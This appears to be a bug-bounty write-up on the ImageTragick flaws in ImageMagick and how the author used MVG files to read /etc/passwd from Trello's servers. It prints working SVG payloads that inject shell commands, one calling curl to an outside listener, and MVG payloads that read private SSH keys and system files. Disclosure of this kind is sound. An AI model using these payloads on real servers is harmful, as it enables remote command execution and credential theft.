As you may know, an ImageMagick vulnerability has recently been disclosed following the research of Stewie and Nikolay Ermishkin (you can read more on the dedicated website). The vulnerability appears when ImageMagick is used to convert an image from one format to another.

There are basically two problems, the first one is that ImageMagick relies on the system to do some kind of actions. It uses delegates. For instance, if a SVG file needs an external resource, ImageMagick will use curl to load the resource. The external resource url is not sanitised correctly, it means that following the curl command, any Shell command with the url will be executed.

With this kind of payload in a SVG file :

<image xlink:href="https://hethical.io/content/images/2016/06/me.jpg"; eval ls; echo "vulnerable" x="0" y="0" height="640px" width="480px"/>

ImageMagick will take the xlink:href attribute and do a curl on it. The result will be :

"curl" -s -k -L -o "%o" "https://hethical.io/content/images/2016/06/me.jpg"; eval ls; echo "vulnerable"

The ls command will be run during the image conversion. I used the eval trick to bypass filters (not on Trello). Using this vulnerability you can run any shell command server side.

If the result of the ls command is not rendered client side, the first step is to ping your server to be sure that the ImageMagick version used is vulnerable. To do that you can use this kind of payload with your url :

<image xlink:href="https://hethical.io/content/images/2016/06/me.jpg"; curl https://hethical.io/listen; echo "vulnerable" x="0" y="0" height="640px" width="480px"/>

If ImageMagick is not patched, /listen will be called.

The second problem comes from the Magick Vector Graphic format. The native ImageMagick vector metafile format. A text file containing vector drawing commands accepted by the convert and the draw option. A MVG file looks like the following:

push graphic-context viewbox 0 0 640 480 image over 0,0 0,0 'label:@/Users/fco/.ssh/id_rsa' pop graphic-context

It provides a set of commands that will be interpreted by ImageMagick. Some of these commands are vulnerable, for instance in the previous MVG, the label command will retrieve the file /Users/fco/.ssh/id_rsa and write its content in the final image. msl will move files, ephemeral will delete files, fill 'url(http://example.com/)' will allow SSRF attacks.

If a service allows MVG files, ImageMagick will interpret these commands. That was the problem on Trello. They correctly patched their system when ImageTragick has been released so a RCE was not possible but they did not think about MVG files.

When you upload a profile picture or a board background on Trello, a PNG miniature is created. To convert the original image to the miniature image, ImageMagick is used. By uploading a MVG file with a correct label command, I was able to write the /etc/passwd file into the generated miniature. It was pretty hard to read the file's content as the generated image is small. I did not try to move or delete files on the server for obvious reason, but as the label was working, we can assume that the moving and deletion was possible.

To solve the issue, now Trello forbids the upload of MVG files.

I advice you to install a vulnerable version of ImageMagick locally so that you can test your payloads. It is especially useful if you need to craft payloads to bypass filters.

Using ImageTragick I also found a RCE allowing any Shell command on the server (not on Trello), the risk is real and you must carefully review your stack to be sure that ImageMagick is not used, or patched.

The bug has been fixed and a $1024 bounty has been paid.